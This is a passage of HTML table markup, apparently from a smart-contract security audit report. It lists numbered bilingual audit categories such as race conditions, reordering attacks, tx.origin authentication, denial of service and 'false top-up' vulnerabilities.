center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">7</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">竞争条件审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Race Conditions Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">重排序攻击审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Reordering Attack Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">8</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">权限漏洞审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Permission Vulnerability Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">访问控制审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Access Control Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td rowspan="9" style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">9</span></span></p></td><td rowspan="9" style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">安全设计审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Security Design Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">外部模块安全使用审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(External Module Safe Use Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">编译器版本安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Compiler Version Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">硬编码地址安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Hard-coded Address Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">Fallback 函数安全使用审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Fallback Function Safe Use Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">显式编码安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Explicit Encoding Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">函数返回值安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Function Return Value Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">外部调用函数安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(External Call Function Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">区块数据依赖安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Block data Dependence Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">tx.origin 认证安全审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(tx.origin Authentication Security Audit)</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">10</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">拒绝服务审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Denial of Service Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">11</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">Gas 优化审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Gas Optimization Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">12</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">设计逻辑审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Design Logic Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">13</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">变量覆盖漏洞审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Variable Coverage Vulnerability Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">14</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">&#34;假充值&#34;漏洞审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(&#34;False Top-up&#34; Vulnerability Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">15</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">作用域与声明审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Scoping and Declarations Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">16</span></span></p></td><td 